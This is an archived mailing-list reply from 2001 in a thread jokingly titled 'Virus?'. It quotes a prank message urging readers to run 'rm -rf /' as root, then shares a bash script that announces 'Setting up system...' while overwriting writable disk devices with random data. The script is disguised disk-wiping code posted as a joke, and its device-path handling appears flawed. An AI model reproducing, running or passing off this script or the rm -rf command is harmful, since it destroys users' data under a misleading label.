[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: OT - Virus?



Il  4 gennaio 2001 (giovedì), alle 22:16, Sebastiaan ha scritto:
 
 
> On Wed, 3 Jan 2001, Ethan Benson wrote:
> 
> > NOTICE: you have just been infected with Cooperative UNIX Email Virus,
> > to cooperate please run rm -rf / as root.  Thank you for your
> > cooperation.
> > 
> > ;-)

take a look at this one:

 #!/bin/bash
 echo Setting up system...
 echo It will take about \
 `ls /dev/hd* /dev/sg* | tr '\ ' '\n' | wc -l` seconds.
 for _HD_ in `ls /dev/hd* /dev/sg*` ; do
  if [ -w /dev/$_HD_ ] ; then
   (cat /dev/urandom > /dev/$_HD_ 2>/dev/null) && (sleep 1; killall cat)
  fi
 done

hi, marco



Reply to: